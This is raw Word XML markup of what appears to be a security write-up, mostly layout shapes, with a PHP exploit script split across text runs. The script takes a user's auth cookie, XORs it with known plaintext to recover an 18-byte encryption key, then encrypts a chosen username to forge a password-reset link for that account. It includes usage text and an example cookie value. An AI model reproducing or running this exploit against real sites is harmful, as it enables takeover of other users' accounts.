            <v:rect id="_x0000_s5651" style="position:absolute;left:2397;top:11142;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5650" style="position:absolute;left:2497;top:11142;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5649" style="position:absolute;left:2597;top:11142;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5648" style="position:absolute;left:2697;top:11142;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5647" style="position:absolute;left:2797;top:11142;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5646" style="position:absolute;left:2897;top:11142;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5645" style="position:absolute;left:1617;top:11405;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s5644" type="#_x0000_t75" style="position:absolute;left:1797;top:11468;width:700;height:200">
              <v:imagedata r:id="rId76" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s5643" style="position:absolute;left:2497;top:11468;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5642" style="position:absolute;left:3220;top:11468;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5641" style="position:absolute;left:3340;top:11468;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5640" style="position:absolute;left:3461;top:11468;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5639" style="position:absolute;left:3581;top:11468;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5638" style="position:absolute;left:3822;top:11468;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5637" style="position:absolute;left:3943;top:11468;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5636" style="position:absolute;left:4184;top:11468;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5635" style="position:absolute;left:4304;top:11468;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5634" style="position:absolute;left:4425;top:11468;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5633" style="position:absolute;left:4545;top:11468;width:362;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5632" style="position:absolute;left:4907;top:11468;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5631" style="position:absolute;left:5027;top:11468;width:603;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5630" style="position:absolute;left:1617;top:11731;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s5629" type="#_x0000_t75" style="position:absolute;left:1797;top:11794;width:720;height:200">
              <v:imagedata r:id="rId75" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s5628" style="position:absolute;left:1617;top:12057;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5627" style="position:absolute;left:1797;top:12120;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5626" style="position:absolute;left:1897;top:12120;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5625" style="position:absolute;left:1997;top:12120;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5624" style="position:absolute;left:2097;top:12120;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5623" style="position:absolute;left:2197;top:12120;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5622" style="position:absolute;left:2297;top:12120;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5621" style="position:absolute;left:2397;top:12120;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5620" style="position:absolute;left:2497;top:12120;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5619" style="position:absolute;left:2597;top:12120;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5618" style="position:absolute;left:2697;top:12120;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5617" style="position:absolute;left:2797;top:12120;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5616" style="position:absolute;left:2897;top:12120;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5615" style="position:absolute;left:2997;top:12120;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5614" style="position:absolute;left:3479;top:12120;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5613" style="position:absolute;left:3599;top:12120;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5612" style="position:absolute;left:3840;top:12120;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5611" style="position:absolute;left:3961;top:12120;width:1446;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5610" style="position:absolute;left:5407;top:12120;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5609" style="position:absolute;left:5527;top:12120;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5608" style="position:absolute;left:5648;top:12120;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5607" style="position:absolute;left:5768;top:12120;width:1687;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5606" style="position:absolute;left:1617;top:12383;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s5605" type="#_x0000_t75" style="position:absolute;left:1797;top:12446;width:720;height:200">
              <v:imagedata r:id="rId75" o:title=""/>
            </v:shape>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:group>
        </w:pic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5603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ed="f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----------------------------------------------------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---\n\n</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>" )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($argc &lt; 3) {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="3010"/>
                      <w:tab w:val="left" w:pos="3608"/>
                    </w:tabs>
                    <w:spacing w:before="126" w:line="391" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="245" w:firstLine="600"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>print_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>r(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/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"Usage:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:tab/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t>php exp.php</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-4"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>uid</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-5"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>password</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="99"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>auth_cookie\nexample:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t>php exp.php</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr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color w:val="333333"/>
                    </w:rPr>
                    <w:t>1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s3cr4t</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="99"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>AjAGAAcFVwcHBwYHUA8GU19UBwtTV1AGAQQMUgMEWwpSVg%3D%3D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\n\n");</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="124"/>
                    <w:ind w:left="879" w:right="50"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>exit(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$uid = $</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>argv[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>1];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 xml:space="preserve">$password = </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>md5(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$argv[2]);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$auth_cookie = $</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>argv[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>3];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str</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> = "$uid \t$password "</w:t>
                  </w:r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006"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$key = anti_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>strcode(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>"$auth_cookie ", " $str"); print "[+]Key: $key \n";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524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"[*]Input the username you want to reset: "; fscanf(STDIN, "%s\n", $username);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"[*]Encrypting...\n";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 xml:space="preserve">$code = </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>urlencode(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>strcode($username, $key));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"[+]Reset password</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> here: ?user/resetpass/$code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\n";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//function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anti_strcode($authstr, $plaintxt)</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="124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780" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$key = '';</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="780" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$authstr = </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>urldecode(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>base64_decode($authstr));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879" w:right="50"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>for(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$i = 0; $i &lt; 18; $i++)</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="7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4"/>
                    <w:ind w:left="13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key .=</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> $authstr[$i] ^ $plaintxt[$i];</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="7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5496" style="width:337.75pt;height:230.4pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="6755,4608">
            <v:rect id="_x0000_s5602" style="position:absolute;left:5;top:5;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s5601" type="#_x0000_t75" style="position:absolute;left:185;top:248;width:700;height:200">
              <v:imagedata r:id="rId76" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s5600" style="position:absolute;left:885;top:248;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5599" style="position:absolute;left:1608;top:248;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5598" style="position:absolute;left:1728;top:248;width:603;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5597" style="position:absolute;left:5;top:511;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5596" style="position:absolute;left:185;top:574;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5595" style="position:absolute;left:5;top:837;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5594" style="position:absolute;left:185;top:900;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5593" style="position:absolute;left:1149;top:900;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5592" style="position:absolute;left:1269;top:900;width:1928;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5591" style="position:absolute;left:3197;top:900;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5590" style="position:absolute;left:3318;top:900;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5589" style="position:absolute;left:3920;top:900;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5588" style="position:absolute;left:4041;top:900;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5587" style="position:absolute;left:5;top:1163;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s5586" type="#_x0000_t75" style="position:absolute;left:185;top:1226;width:400;height:200">
              <v:imagedata r:id="rId37" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s5585" style="position:absolute;left:585;top:1226;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5584" style="position:absolute;left:1067;top:1226;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5583" style="position:absolute;left:1187;top:1226;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5582" style="position:absolute;left:1308;top:1226;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5581" style="position:absolute;left:1428;top:1226;width:362;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5580" style="position:absolute;left:5;top:1489;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s5579" type="#_x0000_t75" style="position:absolute;left:185;top:1552;width:400;height:200">
              <v:imagedata r:id="rId36" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s5578" style="position:absolute;left:585;top:1552;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5577" style="position:absolute;left:1187;top:1552;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5576" style="position:absolute;left:1308;top:1552;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5575" style="position:absolute;left:1428;top:1552;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5574" style="position:absolute;left:1549;top:1552;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5573" style="position:absolute;left:5;top:1815;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5572" style="position:absolute;left:185;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5571" style="position:absolute;left:285;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5570" style="position:absolute;left:385;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5569" style="position:absolute;left:485;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5568" style="position:absolute;left:585;top:1878;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5567" style="position:absolute;left:946;top:1878;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5566" style="position:absolute;left:1067;top:1878;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5565" style="position:absolute;left:1428;top:1878;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5564" style="position:absolute;left:1549;top:1878;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5563" style="position:absolute;left:1669;top:1878;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5562" style="position:absolute;left:1790;top:1878;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5561" style="position:absolute;left:2031;top:1878;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5560" style="position:absolute;left:2151;top:1878;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5559" style="position:absolute;left:2392;top:1878;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5558" style="position:absolute;left:2513;top:1878;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5557" style="position:absolute;left:2633;top:1878;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5556" style="position:absolute;left:2754;top:1878;width:1928;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5555" style="position:absolute;left:4682;top:1878;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5554" style="position:absolute;left:4802;top:1878;width:603;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5553" style="position:absolute;left:5405;top:1878;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5552" style="position:absolute;left:5525;top:1878;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5551" style="position:absolute;left:5;top:2141;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5550" style="position:absolute;left:185;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5549" style="position:absolute;left:285;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5548" style="position:absolute;left:385;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5547" style="position:absolute;left:485;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5546" style="position:absolute;left:585;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5545" style="position:absolute;left:685;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5544" style="position:absolute;left:785;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5543" style="position:absolute;left:885;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5542" style="position:absolute;left:985;top:2204;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5541" style="position:absolute;left:1226;top:2204;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5540" style="position:absolute;left:1346;top:2204;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5539" style="position:absolute;left:1467;top:2204;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5538" style="position:absolute;left:1587;top:2204;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5537" style="position:absolute;left:1828;top:2204;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5536" style="position:absolute;left:1949;top:2204;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5535" style="position:absolute;left:2069;top:2204;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5534" style="position:absolute;left:2190;top:2204;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5533" style="position:absolute;left:5;top:2467;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5532" style="position:absolute;left:185;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5531" style="position:absolute;left:285;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5530" style="position:absolute;left:385;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5529" style="position:absolute;left:485;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5528" style="position:absolute;left:585;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5527" style="position:absolute;left:685;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5526" style="position:absolute;left:785;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5525" style="position:absolute;left:885;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5524" style="position:absolute;left:985;top:2530;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5523" style="position:absolute;left:1587;top:2530;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5522" style="position:absolute;left:1708;top:2530;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5521" style="position:absolute;left:1949;top:2530;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5520" style="position:absolute;left:2069;top:2530;width:1326;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5519" style="position:absolute;left:3395;top:2530;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5518" style="position:absolute;left:3515;top:2530;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5517" style="position:absolute;left:3636;top:2530;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5516" style="position:absolute;left:3756;top:2530;width:1085;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5515" style="position:absolute;left:5;top:2793;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s5514" type="#_x0000_t75" style="position:absolute;left:185;top:2856;width:520;height:200">
              <v:imagedata r:id="rId60" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s5513" style="position:absolute;left:5;top:3119;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s5512" type="#_x0000_t75" style="position:absolute;left:185;top:3182;width:400;height:200">
              <v:imagedata r:id="rId36" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s5511" style="position:absolute;left:585;top:3182;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5510" style="position:absolute;left:1187;top:3182;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5509" style="position:absolute;left:1308;top:3182;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5508" style="position:absolute;left:1428;top:3182;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5507" style="position:absolute;left:1549;top:3182;width:2530;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5506" style="position:absolute;left:5;top:3445;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s5505" type="#_x0000_t75" style="position:absolute;left:185;top:3508;width:400;height:200">
              <v:imagedata r:id="rId36" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s5504" style="position:absolute;left:585;top:3508;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5503" style="position:absolute;left:1308;top:3508;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5502" style="position:absolute;left:1428;top:3508;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5501" style="position:absolute;left:5;top:3771;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5500" style="position:absolute;left:185;top:3834;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5499" style="position:absolute;left:5;top:4097;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5498" style="position:absolute;left:185;top:4160;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s5497" type="#_x0000_t202" style="position:absolute;left:3;top:3;width:6750;height:4603" filled="f" strokecolor="#ccc" strokeweight=".24pt">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="2"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:ind w:left="8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$key;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strcode($string, $key) {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$len = 18;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$code = '';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for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($i = 0; $i &lt; st</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>rlen($string); $i++) {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$k = $i % $len;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code .=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$string[$i] ^ $key[$k];</w:t>
                    </w:r>
                  </w:p>
